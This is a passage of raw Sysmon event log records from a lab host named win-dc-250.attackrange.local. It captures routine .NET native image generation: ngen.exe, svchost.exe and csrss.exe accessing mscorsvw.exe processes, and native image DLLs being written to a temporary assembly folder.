13:23:02.140{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B6-6000-8D02-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:02.077{08A6967A-45B5-6000-8C02-000000009A01}5080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13d8-0\System.Management.Instrumentation.dll2021-01-14 13:23:02.077 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.858{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B7-6000-9502-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.843{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B7-6000-9502-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.843{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B7-6000-9502-000000009A01}4964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:03.780{08A6967A-45B7-6000-9402-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12dc-0\System.Numerics.dll2021-01-14 13:23:03.780 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.577{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B7-6000-9402-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.562{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45B7-6000-9402-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.562{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B7-6000-9402-000000009A01}4828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.530{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B7-6000-9302-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.530{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B7-6000-9302-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.530{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B7-6000-9302-000000009A01}2908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:03.468{08A6967A-45B7-6000-9202-000000009A01}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1048-0\System.Net.Http.WebRequest.dll2021-01-14 13:23:03.468 10341000x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.343{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B7-6000-9202-000000009A01}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.343{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B7-6000-9202-000000009A01}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.343{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B7-6000-9202-000000009A01}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.218{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B7-6000-9102-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.202{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B7-6000-9102-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:03.202{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B7-6000-9102-000000009A01}3044C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:03.124{08A6967A-45B6-6000-9002-000000009A01}3064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\bf8-0\System.Net.dll2021-01-14 13:23:03.124 10341000x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:04.374{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B8-6000-9602-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:04.327{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B8-6000-9602-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:04.327{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B8-6000-9602-000000009A01}4384C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.812{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B9-6000-9A02-000000009A01}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.812{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45B9-6000-9A02-000000009A01}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.812{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45B9-6000-9A02-000000009A01}4444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.687{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45B9-6000-9902-000000009A01}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:05.671{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45B9-6000-9902-000000009A01}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 